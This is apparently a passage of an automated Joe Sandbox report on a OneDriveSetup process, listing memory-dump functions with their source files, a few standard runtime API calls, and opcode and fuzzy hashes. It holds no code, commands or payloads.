Control-flow Graph: function starting at 40af66 (graph image not rendered in this extract)
APIs
• _malloc.LIBCMT ref: 0040AF80
  • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
  • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
  • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
• std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
  • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
• std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
• __CxxThrowException@8.LIBCMT ref: 0040AFC5
Memory Dump Source
• Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
Yara matches
Similarity
• API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
• String ID:
• API String ID: 1411284514-0
• Opcode ID: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
• Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
• Opcode Fuzzy Hash: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
• Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

Control-flow Graph: function starting at 8511190 (graph image not rendered in this extract)
Strings
Memory Dump Source
• Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
Similarity
• API ID:
• String ID: W
• API String ID: 0-655174618
• Opcode ID: 9e415cac01e2ac2165447f1d9c888d84f9ca5ac53beaeb9b44bd5ce200bf4642
• Instruction ID: 7dc67ee1f6c7c6846614ab038391f92d2ad62b1d51a7c1b5e856cd86772db355
• Opcode Fuzzy Hash: 9e415cac01e2ac2165447f1d9c888d84f9ca5ac53beaeb9b44bd5ce200bf4642
• Instruction Fuzzy Hash: EE523E74A00359CFDB64EF64E994B9DBBB5FB88311F0041A9E50AA7395DB342E81CF41

Control-flow Graph: function starting at c41995f (graph image not rendered in this extract)
APIs
• LdrInitializeThunk.NTDLL(00000000), ref: 0C419AA1
Memory Dump Source
• Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 617b89bd9ce5728f1e78da008b750b6a1cd18e4e4ed150531881a0bcd5ba6bc9
• Instruction ID: 553665eb99380b9a52aa19f7908397212c8a71f5da5e6c00554a6b6dfd42ab30
• Opcode Fuzzy Hash: 617b89bd9ce5728f1e78da008b750b6a1cd18e4e4ed150531881a0bcd5ba6bc9
• Instruction Fuzzy Hash: 56115974E002498BDB14DBA9D594EADBBF5FB98304F248266EC88E7341D731ED45CB60

Control-flow Graph: function starting at 401870 (graph image not rendered in this extract)
APIs
  • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
• SysAllocString.OLEAUT32 ref: 00401898
Memory Dump Source
• Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
Yara matches
Similarity
• API ID: AllocString_malloc
• String ID:
• API String ID: 959018026-0
• Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
• Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
• Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
• Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA

Control-flow Graph: (graph image not reproduced)
APIs
• HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549
Memory Dump Source
• Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
Yara matches
Similarity
• API ID: CreateHeap
• String ID:
• API String ID: 10892065-0
• Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
• Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
• Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
• Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548

Control-flow Graph: (graph image not reproduced)
Strings
Memory Dump Source
• Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
Similarity
• API ID:
• String ID: W
• API String ID: 0-655174618
• Opcode ID: ab570e3eab28ac96ac886c2b9ee1e6bf039431e7b405c42e23112f60f7a8b63d
• Instruction ID: b4a912915a6e96cbba40b9e69b377966e11e3516d3ea072661b728d2a16b1bbe
• Opcode Fuzzy Hash: ab570e3eab28ac96ac886c2b9ee1e6bf039431e7b405c42e23112f60f7a8b63d
• Instruction Fuzzy Hash: 6D519375E01218DFDB48DFA9D99499DBBF2BF89300F24816AE419AB364DB319805CF00

Control-flow Graph: (graph image not reproduced)
Memory Dump Source
• Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ac6f8ea0fd484a66c57211678eecc68109b2026bd8e1e622e4db480db5bb038e
• Instruction ID: bea5430f3204fb035ad37e4a1a79b1b619abaa284311d23c76ef58153b4293d4
• Opcode Fuzzy Hash: ac6f8ea0fd484a66c57211678eecc68109b2026bd8e1e622e4db480db5bb038e
• Instruction Fuzzy Hash: 81520B34A003188FEB25DBA4D860B9EBBB2FF88701F5080ADD50A6B795CF355D85AF51

Memory Dump Source
• Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 42383c9897539d3f28bbc0c196481f7519f13499eef6147b74499fac6030810c
• Instruction ID: 95d0997da7082fac08cbb1a7964d075e50af079dbd463e0796bc2d726bfc9917
• Opcode Fuzzy Hash: 42383c9897539d3f28bbc0c196481f7519f13499eef6147b74499fac6030810c
• Instruction Fuzzy Hash: 5212AC345263438F92403B64B5BC16EBEA1FB8F367B40AD45F85FE0485AF798245CE64

Memory Dump Source
• Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4346b3c883257013b38f3a90b6edce19edf07b9e4d7e7973f5ec0b54db6c5d25
• Instruction ID: bc5b8412e1ea73c5b32017c221396426c6b7d6185eef0761a7ab550d37a28eb4
• Opcode Fuzzy Hash: 4346b3c883257013b38f3a90b6edce19edf07b9e4d7e7973f5ec0b54db6c5d25
• Instruction Fuzzy Hash: C712AB345263438F92403B64B6BC16EBEA1FB8F367B40AD45F85FE0485AF798244CE64

Memory Dump Source
• Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2dc4153e47c61fa6049a49fec9d866a201ecbd700ac2503c350fa4682094fedb
• Instruction ID: d3a1656d7ee56f15fa195266ac529ed8e59aa760e20f8037837c3a09b59353f6
• Opcode Fuzzy Hash: 2dc4153e47c61fa6049a49fec9d866a201ecbd700ac2503c350fa4682094fedb
• Instruction Fuzzy Hash: 84522E74A00359CFDB64EF64E994B9DBBB5FB88311F0041A9E50AA7395DB342E81CF81

Memory Dump Source
• Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5fb9dc7dc5d921ed138a6eb699859faaba474188f415dc73d740b4366d437fe8
• Instruction ID: 2d46de82aaf20016311233fc8f79c97c1dbb8250b11da860995489bbfa4ee6d1
• Opcode Fuzzy Hash: 5fb9dc7dc5d921ed138a6eb699859faaba474188f415dc73d740b4366d437fe8
• Instruction Fuzzy Hash: 03124B30A00249DFDF24DF69D884AAEBBF1FF88615F1485A9E8059B365DB31ED41CB50

Memory Dump Source
• Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2989f49daf5e72b3908c10f07eef620a5d01d44ac6a9e1e924b7c172e4f58498
• Instruction ID: 072f3834891b1d10292ff8897adbdd202f482658ef3b0b53ac95fc139f50c708
• Opcode Fuzzy Hash: 2989f49daf5e72b3908c10f07eef620a5d01d44ac6a9e1e924b7c172e4f58498
• Instruction Fuzzy Hash: A0F17F303082118FFF259A39C8747397B96BF85646F9944AEE446CF3A1DB26DC82C791

Memory Dump Source
• Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0f35c13878c47e4d3f0ba464785bc2c2c5939ef0842d9a2637520b687d781d5c
• Instruction ID: ad8a2db8e2fce8122215e1b1292f146873522acbf705ec2df36a1ee32068ca5d
• Opcode Fuzzy Hash: 0f35c13878c47e4d3f0ba464785bc2c2c5939ef0842d9a2637520b687d781d5c
• Instruction Fuzzy Hash: 0FF11B75A00215CFDB14DF68C984AADBBF2FF88721B1A8159E515EB361CB31EC42CB51

Memory Dump Source
• Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 910c0e0d89f235d90203bdc3d8cc3fc99b04c7314449b527fa820328b99fc290
• Instruction ID: d38a10adca438baf01eb55683c3b8bf87b43edfdb87ad1cd241f61bf6164dbb3
• Opcode Fuzzy Hash: 910c0e0d89f235d90203bdc3d8cc3fc99b04c7314449b527fa820328b99fc290
• Instruction Fuzzy Hash: 56B1BB343042518FEF15AF78C894B6A7BE6FF99242F15896DE806CB391CB78C846C791

Memory Dump Source
• Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5e7cce244657194ec20d2a7d367afee23205ca599f91578e719d9748be054b64
• Instruction ID: d212e8b55dcaaaf36564ad81960d36c41f63b384237ed6ca9a8f6cc50a4e3623
• Opcode Fuzzy Hash: 5e7cce244657194ec20d2a7d367afee23205ca599f91578e719d9748be054b64
• Instruction Fuzzy Hash: 9CB10734700600CFEB54DB29C898A29BBF6FF89615B5585A9E50ACB3B1DB31EC41CB91
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 947a70af2a30cc09801c015ad26c16bf8326f60248ace513002067a935b0d09c
                                                                                                                                                                        • Instruction ID: 1fbed569c8382d8e8934f2ba69dcabf300603785a7f884db3ad3795c1260991c
                                                                                                                                                                        • Opcode Fuzzy Hash: 947a70af2a30cc09801c015ad26c16bf8326f60248ace513002067a935b0d09c
                                                                                                                                                                        • Instruction Fuzzy Hash: 93A1F638700600CFDB54DF29C498A29BBE6FF89615B6585A9E50ACB3B1DB31EC41CB91
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 99513906a7d94a2d0a83c04a2617a81789f7b7f5a1ea3cedfc6815e3182ee3ab
                                                                                                                                                                        • Instruction ID: 4a1fb0645b4f6f4dec44ab6169fedbd27c0a97fa9bb1e312e8b8d1e1a57f9288
                                                                                                                                                                        • Opcode Fuzzy Hash: 99513906a7d94a2d0a83c04a2617a81789f7b7f5a1ea3cedfc6815e3182ee3ab
                                                                                                                                                                        • Instruction Fuzzy Hash: 16819D34B00115CFEF14DF69C884AAABBF2FF99316B158569D406EB361DB31E841CB91
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: c96731525b06cd8b6e4cd351ae1d8dcafcfa0c94cdb1ee82f87e9743d33cd760
                                                                                                                                                                        • Instruction ID: 49ae1996020f39c78ee73b44fe2f7a5cd7f938b36fc5b70d23c1911b04fb406d
                                                                                                                                                                        • Opcode Fuzzy Hash: c96731525b06cd8b6e4cd351ae1d8dcafcfa0c94cdb1ee82f87e9743d33cd760
                                                                                                                                                                        • Instruction Fuzzy Hash: FC715934700641CFEF25DF29C898A6A7BE5BF89742B1500A9E812CB771DB75DC41CB90
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 3bd53787dbc186ad1ebb550a17a772f80ddce94dfe7906f0418e742d2f52ddcc
                                                                                                                                                                        • Instruction ID: 74f966c52bd03a2403bddc5c57fd82f0c5c135ca636639e622da4a16c0dc1ab0
                                                                                                                                                                        • Opcode Fuzzy Hash: 3bd53787dbc186ad1ebb550a17a772f80ddce94dfe7906f0418e742d2f52ddcc
                                                                                                                                                                        • Instruction Fuzzy Hash: 8951EF74D01318CFDB14DFA5D854AADBBB2FF88301F608129D80AAB294DB355A45CF41
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 0e32d26469de2fc7ce2bede947bf22adee96decf0ec21a76cd432940961c38b1
                                                                                                                                                                        • Instruction ID: 5bcb68745c3c29efcf691cf76a65631c5df51de1618b3af519f8cdbad2519faa
                                                                                                                                                                        • Opcode Fuzzy Hash: 0e32d26469de2fc7ce2bede947bf22adee96decf0ec21a76cd432940961c38b1
                                                                                                                                                                        • Instruction Fuzzy Hash: 8E51B375E01248DFDF48DFAAD49089DBBF2FF89311B209069E915AB364DB35A841CF50
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: e91954c3408b3f4517d902207eec0987d698010e31d5553a625daf52dea8220f
                                                                                                                                                                        • Instruction ID: 97c7ab1c21b209bdb04390770f0c8ec34bf09b9deca27b824948a721596b3a44
                                                                                                                                                                        • Opcode Fuzzy Hash: e91954c3408b3f4517d902207eec0987d698010e31d5553a625daf52dea8220f
                                                                                                                                                                        • Instruction Fuzzy Hash: 6041C431A05259DFDF13CFA4D844BAEBBB2FF85311F01815AE845AB296D330D855CB90
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 6c2172051c3bb845af8e4edd0f12fabbfc4e1d1d426907698c9b3f6f3bc0a5db
                                                                                                                                                                        • Instruction ID: 6979398691e46bb645456d91c07b02aed4b51f0a1f014d7f97a73fef81a46337
                                                                                                                                                                        • Opcode Fuzzy Hash: 6c2172051c3bb845af8e4edd0f12fabbfc4e1d1d426907698c9b3f6f3bc0a5db
                                                                                                                                                                        • Instruction Fuzzy Hash: 174105367042449FDB14AB65D894AAE7BB2FFCC711F14806DE906E7381DE319C02CBA1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 99916f4c8f33b00fb487761c5c2b67fbc0d0f816772a1ad220e0db2d84804cc0
                                                                                                                                                                        • Instruction ID: 5002a14c0b3a84d0dc9fcfed8819d9da08760129e049fdf1b5bd0eb716b13eb5
                                                                                                                                                                        • Opcode Fuzzy Hash: 99916f4c8f33b00fb487761c5c2b67fbc0d0f816772a1ad220e0db2d84804cc0
                                                                                                                                                                        • Instruction Fuzzy Hash: D3319031304259DFDF15AFA4D854AAE3BA6FB88306F508029F9068B350DB74C862DBA1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: e992edc64e7444d80df3af25c9412e7fb773b22d16e92612f454d60d9291aa20
                                                                                                                                                                        • Instruction ID: 025d9dc027ac113bbd0be1ec449694fdaad1ed02ca164bde734c15923be2653e
                                                                                                                                                                        • Opcode Fuzzy Hash: e992edc64e7444d80df3af25c9412e7fb773b22d16e92612f454d60d9291aa20
                                                                                                                                                                        • Instruction Fuzzy Hash: 0531F1313082168FEF352735889463D7697FFCA256B18447ED946CB3A6EB26CC4297C2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: f06edb3df0638528252377151ebc300a59a4399a09533ecfb1c12ac2f5514244
                                                                                                                                                                        • Instruction ID: 043b0219aae64e910e30db633f2fa482a4560d48c71bfdb0677222183a6d8903
                                                                                                                                                                        • Opcode Fuzzy Hash: f06edb3df0638528252377151ebc300a59a4399a09533ecfb1c12ac2f5514244
                                                                                                                                                                        • Instruction Fuzzy Hash: 4831C978D09684CFCB14EF70F4989AABB71FB95352B506069E802B3361DB701D86CF26
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
• String ID:
• API String ID:
• Opcode ID: 8f25911c361f0c5df3dcbc840c890c14d9a1a40e6577c648a85d2bd6fda8ba78
• Instruction ID: 83c9fdf2ba84a22e1ace6dbbd317157320235438dd0904b7624e7a567ea700f7
• Opcode Fuzzy Hash: 8f25911c361f0c5df3dcbc840c890c14d9a1a40e6577c648a85d2bd6fda8ba78
• Instruction Fuzzy Hash: A4318B75B005058FDB14DF68C9C89AEBBB2FFC8321B598259E415DB3A5CB30AC52CB91

Memory Dump Source
• Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4a99e051165fbbf34e5bd49449f12553cd491925697f2a4dc7afafeca78733f7
• Instruction ID: 46dde5ed1fb399e6c168d3d27812925266f6a3f19c95ab9f1ff8a94336bf9a17
• Opcode Fuzzy Hash: 4a99e051165fbbf34e5bd49449f12553cd491925697f2a4dc7afafeca78733f7
• Instruction Fuzzy Hash: B9219F313082168BFF346625885473E769BBFC9616F18843DD946DB395EF36CC82A782

Memory Dump Source
• Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 557c5585f674673e01b04efc07c18a7fced4a22574b90ed14f30882c5885372f
• Instruction ID: fbd3639d435be20ed79e94ee8f9f6e93a7d1e48d80e7eb8428498d02009c9cc8
• Opcode Fuzzy Hash: 557c5585f674673e01b04efc07c18a7fced4a22574b90ed14f30882c5885372f
• Instruction Fuzzy Hash: 3D2107367082589FDF15AF64D854AAE3BE1FBC9326F00402EF5468B381D674885BCBA1

Memory Dump Source
• Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9737fe77c6b117757dc6cda239e18e3f2ff148b142c42d5a07cd5ca59a17d5a5
• Instruction ID: 8a640517e2e327886017bf1226a1b18d05f4e952020e1a5bfd01b81f7c8ce2e4
• Opcode Fuzzy Hash: 9737fe77c6b117757dc6cda239e18e3f2ff148b142c42d5a07cd5ca59a17d5a5
• Instruction Fuzzy Hash: 7521D435B05A11EFDB299B24C8A452EBBE2FFD9752705806DE906DB391DF30DC028790

Memory Dump Source
• Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dcfa8eac9359d33e3157d2f2fbb5a51cabe49bbb230cf3771600d2544df02cd0
• Instruction ID: 23d8d6615103f50aecb410904dd4fc6792767d2d8d57580aa34350d820bf290d
• Opcode Fuzzy Hash: dcfa8eac9359d33e3157d2f2fbb5a51cabe49bbb230cf3771600d2544df02cd0
• Instruction Fuzzy Hash: CD312374D01318DBEB04DFA5C4947EEBBB2BF89346F508429D809BB284EB755546CF50

Memory Dump Source
• Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 75a4ce3811ff02515296b7e50d15bdb8b52ed564fa4bbcc720b3e6e300a78382
• Instruction ID: 88b79c9e4ef9c53e9850ab33c9a4425eb346fdd699e07b42ebb9c453e304887f
• Opcode Fuzzy Hash: 75a4ce3811ff02515296b7e50d15bdb8b52ed564fa4bbcc720b3e6e300a78382
• Instruction Fuzzy Hash: 1D218E76A00106DFDF14DB24C8409BE77A5FB99261F10C61DD9199B384DB32EA46CBD1

Memory Dump Source
• Source File: 00000006.00000002.2694430885.000000000847D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0847D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_847d000_OneDriveSetup.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0f4e68073450821e89d914eca5ad2a294af1d01b328f1887aca7360750168c10
• Instruction ID: ef3b5c5966ada894d8b40badee3505ed1178ba70ecbbd2f093b23461b46dcbe7
• Opcode Fuzzy Hash: 0f4e68073450821e89d914eca5ad2a294af1d01b328f1887aca7360750168c10
• Instruction Fuzzy Hash: BB2103B5914240DFDB04DF14D9C4B56BF65FF98326F24856EE8090B34AC336D456CBA2

Memory Dump Source
• Source File: 00000006.00000002.2694495981.000000000848D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0848D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_848d000_OneDriveSetup.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a4fe68616dfa6031add501212d0b6400a4c1f92e7701bc7607df6e7fdddceda6
• Instruction ID: 6cad608bc6e67eb6f593705511a9085d99102563dff2c1b947cea0bbb5715c3b
• Opcode Fuzzy Hash: a4fe68616dfa6031add501212d0b6400a4c1f92e7701bc7607df6e7fdddceda6
• Instruction Fuzzy Hash: AD212575A04304DFDB04EF14D980B1ABBA1FB84219F20C56ED8094B386D336D847CB61

Memory Dump Source
• Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b46e0862ba592454e285eb3f51f9d85b050f4cdaed026210cf0ee2e4b11dec34
